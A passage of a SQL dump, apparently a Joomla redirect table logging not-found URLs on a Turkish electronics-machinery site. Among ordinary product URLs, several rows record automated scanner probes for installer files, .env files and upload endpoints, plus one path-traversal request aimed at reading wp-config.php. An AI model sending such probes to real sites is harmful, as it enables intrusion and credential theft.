00:00:00',301),(27996,'http://3s-technologies.com.tr/tr/2021',NULL,'http://3s-technologies.com.tr/2021','',31,0,'2021-11-06 06:29:24','0000-00-00 00:00:00',301),(27997,'http://3s-technologies.com.tr/tr/newfolder',NULL,'http://3s-technologies.com.tr/newfolder','',2,0,'2021-11-06 06:29:24','0000-00-00 00:00:00',301),(27998,'http://3s-technologies.com.tr/tr/bac',NULL,'http://3s-technologies.com.tr/bac','',30,0,'2021-11-06 06:29:27','0000-00-00 00:00:00',301),(27999,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/odd-shape-inserter/by,product_name?language=tr-tr&keyword=',NULL,'','',1,0,'2021-11-06 13:49:15','0000-00-00 00:00:00',301),(28000,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/tolo',NULL,'','',22,0,'2021-11-06 20:29:51','0000-00-00 00:00:00',301),(28001,'https://www.3s-technologies.com.tr/tr/pcb-prototip-prototyping/pcb-kazä±ma-milling',NULL,'','',11,0,'2021-11-07 01:52:57','0000-00-00 00:00:00',301),(28002,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-orta-hä±zlä±/dirdesc?language=tr-tr&keyword=',NULL,'','',3,0,'2021-11-07 06:26:30','0000-00-00 00:00:00',301),(28003,'https://www.3s-technologies.com.tr/en/akrilik-iåÿleme-acrylic-processing',NULL,'','',5,0,'2021-11-07 06:42:00','0000-00-00 00:00:00',301),(28004,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/odd-shape-inserter/by,mf_name?language=tr-tr&keyword=',NULL,'','',1,0,'2021-11-07 06:57:11','0000-00-00 00:00:00',301),(28005,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/cnc/3s-cnc-01-1500x1500-detail/askquestion?tmpl=component',NULL,'','',2,0,'2021-11-07 08:59:36','0000-00-00 00:00:00',301),(28006,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/thru-hole/jv131-detail',NULL,'','',3,0,'2021-11-07 09:06:18','0000-00-00 00:00:00',301),(28007,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/wood-processing-ahåÿap-iåÿleme',NULL,'','',3,0,'2021-11-07 15:14:42','0000-00-00 00:00:00',301),(28008,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/ddm-novastar/dalga-lehim?language=tr-tr&keyword=',NULL,'','',10,0,'2021-11-07 18:23:12','0000-00-00 00:00:00',301),(28009,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/by,product_name?language=tr-tr&keyword=',NULL,'','',3,0,'2021-11-07 20:41:59','0000-00-00 00:00:00',301),(28010,'http://www.3s-technologies.com.tr/en/pcb-prototip-prototyping/pcb-kazä±ma-milling',NULL,'','',6,0,'2021-11-07 21:00:14','0000-00-00 00:00:00',301),(28011,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/spartan-8s-8d-44-detail',NULL,'','',3,0,'2021-11-07 22:07:24','0000-00-00 00:00:00',301),(28012,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/odd-shape-inserter',NULL,'','',1,0,'2021-11-08 17:47:14','0000-00-00 00:00:00',301),(28013,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/spr-20-41-detail?tmpl=component&print=1',NULL,'','',1,0,'2021-11-08 21:17:37','0000-00-00 00:00:00',301),(28014,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/ly-8c-detail?tmpl=component&print=1',NULL,'','',3,0,'2021-11-08 22:31:41','0000-00-00 00:00:00',301),(28015,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/mi-300-detail',NULL,'','',3,0,'2021-11-09 03:00:14','0000-00-00 00:00:00',301),(28016,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-orta-hä±zlä±/am100-detail/askquestion?tmpl=component',NULL,'','',2,0,'2021-11-09 12:11:53','0000-00-00 00:00:00',301),(28017,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/thru-hole/by,category_name?language=tr-tr&keyword=',NULL,'','',2,0,'2021-11-09 23:07:46','0000-00-00 00:00:00',301),(28018,'http://3s-technologies.com.tr/en/xmrlpc.php?daksldlkdsadas=1',NULL,'','',3,0,'2021-11-10 04:50:15','0000-00-00 00:00:00',301),(28019,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/odd-shape-inserter/npm-vf-detail',NULL,'','',2,0,'2021-11-10 05:00:23','0000-00-00 00:00:00',301),(28020,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/cnc/3s-cnc-01-750x750-detail/askquestion?tmpl=component',NULL,'','',2,0,'2021-11-10 06:04:03','0000-00-00 00:00:00',301),(28021,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php',NULL,'','',1,0,'2021-11-10 09:06:50','0000-00-00 00:00:00',301),(28022,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/superlogoshowcase-wp/sls-wp-admin/pages/import.php',NULL,'','',1,0,'2021-11-10 09:06:51','0000-00-00 00:00:00',301),(28023,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/super-interactive-maps/sim-wp-admin/pages/import.php',NULL,'','',1,0,'2021-11-10 09:06:52','0000-00-00 00:00:00',301),(28024,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/thru-hole/by,product_sku?language=tr-tr&keyword=',NULL,'','',2,0,'2021-11-10 09:26:34','0000-00-00 00:00:00',301),(28025,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/gf-12-hc-ht-detail?tmpl=component&print=1',NULL,'','',1,0,'2021-11-10 17:59:49','0000-00-00 00:00:00',301),(28026,'http://www.3s-technologies.com.tr/wp-admin/admin-ajax.php?action=_ning_upload_image',NULL,'','',1,0,'2021-11-10 20:32:46','0000-00-00 00:00:00',301),(28027,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/av132-detail?tmpl=component&print=1',NULL,'','',3,0,'2021-11-10 21:02:43','0000-00-00 00:00:00',301),(28028,'http://www.3s-technologies.com.tr/en/wp-admin/css',NULL,'binance.com','',521,0,'2021-11-11 02:51:10','0000-00-00 00:00:00',301),(28029,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/jvk-detail',NULL,'','',5,0,'2021-11-11 08:27:57','0000-00-00 00:00:00',301),(28030,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/spr-20-detail?tmpl=component&print=1',NULL,'','',4,0,'2021-11-11 09:35:05','0000-00-00 00:00:00',301),(28031,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',2,0,'2021-11-11 17:50:38','0000-00-00 00:00:00',301),(28032,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/rh6-detail/askquestion?tmpl=component',NULL,'','',2,0,'2021-11-11 23:55:06','0000-00-00 00:00:00',301),(28033,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/thru-hole/rg131-detail',NULL,'','',2,0,'2021-11-12 00:00:14','0000-00-00 00:00:00',301),(28034,'http://3s-technologies.com.tr/en/wordpress/wp-login.php',NULL,'http://3s-technologies.com.tr/wordpress/wp-login.php','',21,0,'2021-11-12 02:55:09','0000-00-00 00:00:00',301),(28035,'http://3s-technologies.com.tr/en/wp/wp-login.php',NULL,'http://3s-technologies.com.tr/wp/wp-login.php','',21,0,'2021-11-12 02:55:09','0000-00-00 00:00:00',301),(28036,'http://3s-technologies.com.tr/en/blog/wp-login.php',NULL,'http://3s-technologies.com.tr/blog/wp-login.php','',15,0,'2021-11-12 02:55:09','0000-00-00 00:00:00',301),(28037,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2021-11-12 07:36:22','0000-00-00 00:00:00',301),(28038,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/thru-hole/dirdesc?language=tr-tr&keyword=',NULL,'','',2,0,'2021-11-12 16:39:30','0000-00-00 00:00:00',301),(28039,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/cnc/by,mf_name?language=tr-tr&keyword=',NULL,'','',1,0,'2021-11-12 17:27:16','0000-00-00 00:00:00',301),(28040,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/by,category_name?language=tr-tr&keyword=',NULL,'','',1,0,'2021-11-12 23:42:06','0000-00-00 00:00:00',301),(28041,'http://3s-technologies.com.tr/en/cgi-bin/mt/mt-atom.cgi',NULL,'bluehost.com','',4,0,'2021-11-13 02:42:56','0000-00-00 00:00:00',301),(28042,'http://3s-technologies.com.tr/en/mt/mt-atom.cgi',NULL,'bluehost.com','',4,0,'2021-11-13 02:43:02','0000-00-00 00:00:00',301),(28043,'http://3s-technologies.com.tr/en/cgi-bin/mt-atom.cgi',NULL,'bluehost.com','',2,0,'2021-11-13 02:43:08','0000-00-00 00:00:00',301),(28044,'http://3s-technologies.com.tr/en/mt-atom.cgi',NULL,'bluehost.com','',2,0,'2021-11-13 02:43:29','0000-00-00 00:00:00',301),(28045,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/',NULL,'','',3,0,'2021-11-13 09:49:02','0000-00-00 00:00:00',301),(28046,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/odd-shape-inserter/dirdesc?language=tr-tr&keyword=',NULL,'','',2,0,'2021-11-13 11:33:40','0000-00-00 00:00:00',301),(28047,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-orta-hä±zlä±/by,category_name?language=tr-tr&keyword=',NULL,'','',1,0,'2021-11-13 21:13:08','0000-00-00 00:00:00',301),(28048,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/avf-detail?tmpl=component&print=1',NULL,'','',2,0,'2021-11-13 21:15:32','0000-00-00 00:00:00',301),(28049,'https://www.3s-technologies.com.tr/en/aluminyum-iåÿleme-aluminum-processing/aluminyum-iåÿleme-aluminum-processing',NULL,'','',5,0,'2021-11-14 03:34:44','0000-00-00 00:00:00',301),(28050,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/rh2-20-detail?tmpl=component&print=1',NULL,'','',1,0,'2021-11-14 15:24:04','0000-00-00 00:00:00',301),(28051,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/tolo/dalga-lehim?language=tr-tr&keyword=',NULL,'','',9,0,'2021-11-14 20:11:44','0000-00-00 00:00:00',301),(28052,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/thru-hole/rl132-detail',NULL,'','',2,0,'2021-11-15 05:09:31','0000-00-00 00:00:00',301),(28053,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/odd-shape-inserter/by,category_name?language=tr-tr&keyword=',NULL,'','',2,0,'2021-11-15 11:08:51','0000-00-00 00:00:00',301),(28054,'http://3s-technologies.com.tr/tr/installer.php',NULL,'','',11,0,'2021-11-18 04:42:18','0000-00-00 00:00:00',301),(28055,'http://3s-technologies.com.tr/tr/installer-backup.php',NULL,'','',1,0,'2021-11-18 04:42:18','0000-00-00 00:00:00',301),(28056,'http://3s-technologies.com.tr/tr/wp/installer.php',NULL,'','',2,0,'2021-11-18 04:42:20','0000-00-00 00:00:00',301),(28057,'http://3s-technologies.com.tr/tr/wp/installer-backup.php',NULL,'','',2,0,'2021-11-18 04:42:21','0000-00-00 00:00:00',301),(28058,'http://3s-technologies.com.tr/tr/wp/dup-installer/main.installer.php',NULL,'','',2,0,'2021-11-18 04:42:21','0000-00-00 00:00:00',301),(28059,'http://3s-technologies.com.tr/tr/wordpress/installer.php',NULL,'','',1,0,'2021-11-18 04:42:23','0000-00-00 00:00:00',301),(28060,'http://3s-technologies.com.tr/tr/wordpress/installer-backup.php',NULL,'','',1,0,'2021-11-18 04:42:24','0000-00-00 00:00:00',301),(28061,'http://3s-technologies.com.tr/tr/wordpress/dup-installer/main.installer.php',NULL,'','',1,0,'2021-11-18 04:42:24','0000-00-00 00:00:00',301),(28062,'http://3s-technologies.com.tr/tr/old/installer.php',NULL,'','',1,0,'2021-11-18 04:42:25','0000-00-00 00:00:00',301),(28063,'http://3s-technologies.com.tr/tr/old/installer-backup.php',NULL,'','',1,0,'2021-11-18 04:42:25','0000-00-00 00:00:00',301),(28064,'http://3s-technologies.com.tr/tr/old/dup-installer/main.installer.php',NULL,'','',1,0,'2021-11-18 04:42:26','0000-00-00 00:00:00',301),(28065,'http://3s-technologies.com.tr/tr/blog/installer.php',NULL,'','',2,0,'2021-11-18 04:42:26','0000-00-00 00:00:00',301),(28066,'http://3s-technologies.com.tr/tr/blog/installer-backup.php',NULL,'','',2,0,'2021-11-18 04:42:27','0000-00-00 00:00:00',301),(28067,'http://3s-technologies.com.tr/tr/blog/dup-installer/main.installer.php',NULL,'','',2,0,'2021-11-18 04:42:27','0000-00-00 00:00:00',301),(28068,'http://3s-technologies.com.tr/tr/demo/installer.php',NULL,'','',2,0,'2021-11-18 04:42:29','0000-00-00 00:00:00',301),(28069,'http://3s-technologies.com.tr/tr/demo/installer-backup.php',NULL,'','',1,0,'2021-11-18 04:42:29','0000-00-00 00:00:00',301),(28070,'http://3s-technologies.com.tr/tr/demo/dup-installer/main.installer.php',NULL,'','',1,0,'2021-11-18 04:42:29','0000-00-00 00:00:00',301),(28071,'http://3s-technologies.com.tr/tr/backup/installer.php',NULL,'','',2,0,'2021-11-18 04:42:31','0000-00-00 00:00:00',301),(28072,'http://3s-technologies.com.tr/tr/backup/installer-backup.php',NULL,'','',2,0,'2021-11-18 04:42:31','0000-00-00 00:00:00',301),(28073,'http://3s-technologies.com.tr/tr/backup/dup-installer/main.installer.php',NULL,'','',2,0,'2021-11-18 04:42:31','0000-00-00 00:00:00',301),(28074,'http://3s-technologies.com.tr/tr/new/installer.php',NULL,'','',1,0,'2021-11-18 04:42:33','0000-00-00 00:00:00',301),(28075,'http://3s-technologies.com.tr/tr/new/installer-backup.php',NULL,'','',1,0,'2021-11-18 04:42:33','0000-00-00 00:00:00',301),(28076,'http://3s-technologies.com.tr/tr/new/dup-installer/main.installer.php',NULL,'','',1,0,'2021-11-18 04:42:34','0000-00-00 00:00:00',301),(28077,'http://3s-technologies.com.tr/tr/back/installer.php',NULL,'','',2,0,'2021-11-18 04:42:37','0000-00-00 00:00:00',301),(28078,'http://3s-technologies.com.tr/tr/back/installer-backup.php',NULL,'','',2,0,'2021-11-18 04:42:38','0000-00-00 00:00:00',301),(28079,'http://3s-technologies.com.tr/tr/back/dup-installer/main.installer.php',NULL,'','',2,0,'2021-11-18 04:42:39','0000-00-00 00:00:00',301),(28080,'http://3s-technologies.com.tr/tr/back/wp-admin/setup-config.php',NULL,'','',2,0,'2021-11-18 04:42:39','0000-00-00 00:00:00',301),(28081,'http://3s-technologies.com.tr/tr/shop/installer.php',NULL,'','',1,0,'2021-11-18 04:42:39','0000-00-00 00:00:00',301),(28082,'http://3s-technologies.com.tr/tr/shop/installer-backup.php',NULL,'','',1,0,'2021-11-18 04:42:40','0000-00-00 00:00:00',301),(28083,'http://3s-technologies.com.tr/tr/shop/dup-installer/main.installer.php',NULL,'','',1,0,'2021-11-18 04:42:41','0000-00-00 00:00:00',301),(28084,'http://3s-technologies.com.tr/tr/shop/wp-admin/setup-config.php',NULL,'','',1,0,'2021-11-18 04:42:41','0000-00-00 00:00:00',301),(28085,'https://3s-technologies.com.tr/en/apple-touch-icon-120x120-precomposed.png',NULL,'','',1,0,'2021-11-18 19:26:41','0000-00-00 00:00:00',301),(28086,'https://3s-technologies.com.tr/en/apple-touch-icon-120x120.png',NULL,'','',1,0,'2021-11-18 19:26:42','0000-00-00 00:00:00',301),(28087,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/thru-hole',NULL,'','',1,0,'2021-11-19 07:15:15','0000-00-00 00:00:00',301),(28088,'https://3s-technologies.com.tr/tr/wp/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php',NULL,'','',1,0,'2021-11-19 08:58:11','0000-00-00 00:00:00',301),(28089,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/temizleme-makineleri/stencil-washer-eco-detail',NULL,'','',2,0,'2021-11-19 14:18:42','0000-00-00 00:00:00',301),(28090,'http://www.3s-technologies.com.tr/en/sites/default/files',NULL,'binance.com','',1,0,'2021-11-19 20:30:00','0000-00-00 00:00:00',301),(28091,'http://www.3s-technologies.com.tr/en/admin/controller/extension/extension',NULL,'binance.com','',1,0,'2021-11-19 20:30:11','0000-00-00 00:00:00',301),(28092,'http://www.3s-technologies.com.tr/en/uploads',NULL,'binance.com','',1,0,'2021-11-19 20:30:22','0000-00-00 00:00:00',301),(28093,'http://www.3s-technologies.com.tr/en/files',NULL,'binance.com','',1,0,'2021-11-19 20:30:45','0000-00-00 00:00:00',301),(28094,'http://mail.3s-technologies.com.tr/tr/installer.php',NULL,'','',1,0,'2021-11-20 09:24:34','0000-00-00 00:00:00',301),(28095,'http://mail.3s-technologies.com.tr/tr/installer-backup.php',NULL,'','',1,0,'2021-11-20 09:24:36','0000-00-00 00:00:00',301),(28096,'http://mail.3s-technologies.com.tr/tr/dup-installer/main.installer.php',NULL,'','',1,0,'2021-11-20 09:24:37','0000-00-00 00:00:00',301),(28097,'http://mail.3s-technologies.com.tr/tr/wp-admin/setup-config.php',NULL,'','',8,0,'2021-11-20 09:24:37','0000-00-00 00:00:00',301),(28098,'http://mail.3s-technologies.com.tr/tr/wp/installer.php',NULL,'','',2,0,'2021-11-20 09:24:38','0000-00-00 00:00:00',301),(28099,'http://mail.3s-technologies.com.tr/tr/wp/installer-backup.php',NULL,'','',2,0,'2021-11-20 09:24:38','0000-00-00 00:00:00',301),(28100,'http://mail.3s-technologies.com.tr/tr/wp/dup-installer/main.installer.php',NULL,'','',2,0,'2021-11-20 09:24:39','0000-00-00 00:00:00',301),(28101,'http://mail.3s-technologies.com.tr/tr/wp/wp-admin/setup-config.php',NULL,'','',3,0,'2021-11-20 09:24:39','0000-00-00 00:00:00',301),(28102,'http://mail.3s-technologies.com.tr/tr/wordpress/installer.php',NULL,'','',1,0,'2021-11-20 09:24:40','0000-00-00 00:00:00',301),(28103,'http://mail.3s-technologies.com.tr/tr/wordpress/installer-backup.php',NULL,'','',1,0,'2021-11-20 09:24:41','0000-00-00 00:00:00',301),(28104,'http://mail.3s-technologies.com.tr/tr/wordpress/dup-installer/main.installer.php',NULL,'','',1,0,'2021-11-20 09:24:41','0000-00-00 00:00:00',301),(28105,'http://mail.3s-technologies.com.tr/tr/wordpress/wp-admin/setup-config.php',NULL,'','',1,0,'2021-11-20 09:24:42','0000-00-00 00:00:00',301),(28106,'http://mail.3s-technologies.com.tr/tr/old/installer.php',NULL,'','',1,0,'2021-11-20 09:24:42','0000-00-00 00:00:00',301),(28107,'http://mail.3s-technologies.com.tr/tr/old/installer-backup.php',NULL,'','',1,0,'2021-11-20 09:24:43','0000-00-00 00:00:00',301),(28108,'http://mail.3s-technologies.com.tr/tr/old/dup-installer/main.installer.php',NULL,'','',1,0,'2021-11-20 09:24:43','0000-00-00 00:00:00',301),(28109,'http://mail.3s-technologies.com.tr/tr/old/wp-admin/setup-config.php',NULL,'','',1,0,'2021-11-20 09:24:44','0000-00-00 00:00:00',301),(28110,'http://mail.3s-technologies.com.tr/tr/blog/installer.php',NULL,'','',2,0,'2021-11-20 09:24:44','0000-00-00 00:00:00',301),(28111,'http://mail.3s-technologies.com.tr/tr/blog/installer-backup.php',NULL,'','',2,0,'2021-11-20 09:24:45','0000-00-00 00:00:00',301),(28112,'http://mail.3s-technologies.com.tr/tr/blog/dup-installer/main.installer.php',NULL,'','',2,0,'2021-11-20 09:24:45','0000-00-00 00:00:00',301),(28113,'http://mail.3s-technologies.com.tr/tr/blog/wp-admin/setup-config.php',NULL,'','',3,0,'2021-11-20 09:24:46','0000-00-00 00:00:00',301),(28114,'http://mail.3s-technologies.com.tr/tr/demo/installer.php',NULL,'','',1,0,'2021-11-20 09:24:47','0000-00-00 00:00:00',301),(28115,'http://mail.3s-technologies.com.tr/tr/demo/installer-backup.php',NULL,'','',1,0,'2021-11-20 09:24:47','0000-00-00 00:00:00',301),(28116,'http://mail.3s-technologies.com.tr/tr/demo/dup-installer/main.installer.php',NULL,'','',1,0,'2021-11-20 09:24:48','0000-00-00 00:00:00',301),(28117,'http://mail.3s-technologies.com.tr/tr/demo/wp-admin/setup-config.php',NULL,'','',1,0,'2021-11-20 09:24:49','0000-00-00 00:00:00',301),(28118,'http://mail.3s-technologies.com.tr/tr/backup/installer.php',NULL,'','',2,0,'2021-11-20 09:24:50','0000-00-00 00:00:00',301),(28119,'http://mail.3s-technologies.com.tr/tr/backup/installer-backup.php',NULL,'','',2,0,'2021-11-20 09:24:50','0000-00-00 00:00:00',301),(28120,'http://mail.3s-technologies.com.tr/tr/backup/dup-installer/main.installer.php',NULL,'','',2,0,'2021-11-20 09:24:51','0000-00-00 00:00:00',301),(28121,'http://mail.3s-technologies.com.tr/tr/backup/wp-admin/setup-config.php',NULL,'','',2,0,'2021-11-20 09:24:52','0000-00-00 00:00:00',301),(28122,'http://mail.3s-technologies.com.tr/tr/new/installer.php',NULL,'','',1,0,'2021-11-20 09:24:53','0000-00-00 00:00:00',301),(28123,'http://mail.3s-technologies.com.tr/tr/new/installer-backup.php',NULL,'','',1,0,'2021-11-20 09:24:54','0000-00-00 00:00:00',301),(28124,'http://mail.3s-technologies.com.tr/tr/new/dup-installer/main.installer.php',NULL,'','',1,0,'2021-11-20 09:24:54','0000-00-00 00:00:00',301),(28125,'http://mail.3s-technologies.com.tr/tr/new/wp-admin/setup-config.php',NULL,'','',2,0,'2021-11-20 09:24:55','0000-00-00 00:00:00',301),(28126,'http://mail.3s-technologies.com.tr/tr/back/installer.php',NULL,'','',2,0,'2021-11-20 09:24:59','0000-00-00 00:00:00',301),(28127,'http://mail.3s-technologies.com.tr/tr/back/installer-backup.php',NULL,'','',2,0,'2021-11-20 09:25:00','0000-00-00 00:00:00',301),(28128,'http://mail.3s-technologies.com.tr/tr/back/dup-installer/main.installer.php',NULL,'','',2,0,'2021-11-20 09:25:02','0000-00-00 00:00:00',301),(28129,'http://mail.3s-technologies.com.tr/tr/back/wp-admin/setup-config.php',NULL,'','',2,0,'2021-11-20 09:25:03','0000-00-00 00:00:00',301),(28130,'http://mail.3s-technologies.com.tr/tr/shop/installer.php',NULL,'','',1,0,'2021-11-20 09:25:04','0000-00-00 00:00:00',301),(28131,'http://mail.3s-technologies.com.tr/tr/shop/installer-backup.php',NULL,'','',1,0,'2021-11-20 09:25:05','0000-00-00 00:00:00',301),(28132,'http://mail.3s-technologies.com.tr/tr/shop/dup-installer/main.installer.php',NULL,'','',1,0,'2021-11-20 09:25:06','0000-00-00 00:00:00',301),(28133,'http://mail.3s-technologies.com.tr/tr/shop/wp-admin/setup-config.php',NULL,'','',1,0,'2021-11-20 09:25:07','0000-00-00 00:00:00',301),(28134,'http://3s-technologies.com.tr/tr/modules/mod_ariimageslidersa/info.php',NULL,'','',1,0,'2021-11-21 12:06:17','0000-00-00 00:00:00',301),(28135,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/lazer-markalama/by,product_sku?language=tr-tr&keyword=',NULL,'','',1,0,'2021-11-21 23:56:01','0000-00-00 00:00:00',301),(28136,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/thru-hole/jv131-detail/askquestion?tmpl=component',NULL,'','',1,0,'2021-11-22 01:15:20','0000-00-00 00:00:00',301),(28137,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/temizleme-makineleri/by,mf_name?language=tr-tr&keyword=',NULL,'','',2,0,'2021-11-22 17:47:33','0000-00-00 00:00:00',301),(28138,'http://3s-technologies.com.tr/tr/wp-content/plugins/smart-product-review/css/solid.css',NULL,'','',1,0,'2021-11-23 01:22:18','0000-00-00 00:00:00',301),(28139,'http://3s-technologies.com.tr/tr/typo3conf/ext/hi_surveystats/res/php-ofc-library/ofc_upload_image.php',NULL,'','',5,0,'2021-11-23 07:49:06','0000-00-00 00:00:00',301),(28140,'http://3s-technologies.com.tr/tr/chart/php-ofc-library/ofc_upload_image.php',NULL,'','',7,0,'2021-11-24 16:39:07','0000-00-00 00:00:00',301),(28141,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-ultra-hä±z/npm-w2-detail/askquestion?tmpl=component',NULL,'','',1,0,'2021-11-25 08:19:28','0000-00-00 00:00:00',301),(28142,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/temizleme-makineleri/trident-detail',NULL,'','',2,0,'2021-11-25 14:45:52','0000-00-00 00:00:00',301),(28143,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/temizleme-makineleri/zero-ion-g3-detail',NULL,'','',2,0,'2021-11-25 17:51:41','0000-00-00 00:00:00',301),(28144,'http://3s-technologies.com.tr/tr/graph/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2021-11-26 02:43:09','0000-00-00 00:00:00',301),(28145,'http://3s-technologies.com.tr/tr/ofc/php-ofc-library/ofc_upload_image.php',NULL,'','',4,0,'2021-11-26 06:03:11','0000-00-00 00:00:00',301),(28146,'http://www.3s-technologies.com.tr/en/pcb-prototip-prototyping/pcb-yã¼kseklik-self-levelling',NULL,'','',6,0,'2021-11-26 09:00:03','0000-00-00 00:00:00',301),(28147,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',4,0,'2021-11-26 11:59:16','0000-00-00 00:00:00',301),(28148,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/by,product_name?language=tr-tr&keyword=',NULL,'','',11,0,'2021-11-26 12:27:37','0000-00-00 00:00:00',301),(28149,'http://3s-technologies.com.tr/tr/wp-old',NULL,'http://3s-technologies.com.tr/wp-old','',30,0,'2021-11-26 14:36:18','0000-00-00 00:00:00',301),(28150,'http://3s-technologies.com.tr/tr/sitio',NULL,'http://3s-technologies.com.tr/sitio','',28,0,'2021-11-26 14:36:24','0000-00-00 00:00:00',301),(28151,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/avf-detail',NULL,'','',6,0,'2021-11-26 15:20:04','0000-00-00 00:00:00',301),(28152,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/temizleme-makineleri/by,category_name?language=tr-tr&keyword=',NULL,'','',2,0,'2021-11-26 15:35:46','0000-00-00 00:00:00',301),(28153,'http://www.3s-technologies.com.tr/en/ahåÿap-iåÿleme-wood-processing-120cm',NULL,'','',2,0,'2021-11-26 16:08:52','0000-00-00 00:00:00',301),(28154,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/lps-c-detail?tmpl=component&print=1',NULL,'','',2,0,'2021-11-26 17:14:35','0000-00-00 00:00:00',301),(28155,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/by,product_sku?language=tr-tr&keyword=',NULL,'','',2,0,'2021-11-26 18:25:46','0000-00-00 00:00:00',301),(28156,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/avb-detail/askquestion?tmpl=component',NULL,'','',3,0,'2021-11-26 20:57:54','0000-00-00 00:00:00',301),(28157,'http://3s-technologies.com.tr/en/contacts/\",\"\",\"\",\"\",\"',NULL,'http://3s-technologies.com.tr/','',1,0,'2021-11-26 22:31:09','0000-00-00 00:00:00',301),(28158,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/temizleme-makineleri/by,product_name?language=tr-tr&keyword=',NULL,'','',2,0,'2021-11-27 02:56:32','0000-00-00 00:00:00',301),(28159,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/rh2-detail/askquestion?tmpl=component',NULL,'','',1,0,'2021-11-27 06:18:42','0000-00-00 00:00:00',301),(28160,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/spg-detail?tmpl=component&print=1',NULL,'','',1,0,'2021-11-27 07:31:06','0000-00-00 00:00:00',301),(28161,'https://www.3s-technologies.com.tr/en/wood-processing-ahåÿap-iåÿleme',NULL,'','',4,0,'2021-11-27 11:19:58','0000-00-00 00:00:00',301),(28162,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/by,mf_name?language=tr-tr',NULL,'','',1,0,'2021-11-27 18:29:27','0000-00-00 00:00:00',301),(28163,'http://3s-technologies.com.tr/tr/admin/php-ofc-library/ofc_upload_image.php',NULL,'','',5,0,'2021-11-27 19:45:55','0000-00-00 00:00:00',301),(28164,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/gf-12-hc-ht-detail',NULL,'','',4,0,'2021-11-27 20:57:12','0000-00-00 00:00:00',301),(28165,'http://www.3s-technologies.com.tr/app/.env',NULL,'','',1,0,'2021-11-28 02:46:29','0000-00-00 00:00:00',301),(28166,'https://3s-technologies.com.tr/app/.env',NULL,'','',1,0,'2021-11-28 02:46:32','0000-00-00 00:00:00',301),(28167,'https://www.3s-technologies.com.tr/app/.env',NULL,'','',1,0,'2021-11-28 02:46:32','0000-00-00 00:00:00',301),(28168,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/spg-detail/askquestion?tmpl=component',NULL,'','',1,0,'2021-11-28 16:45:51','0000-00-00 00:00:00',301),(28169,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/tolo',NULL,'','',1,0,'2021-11-29 09:25:55','0000-00-00 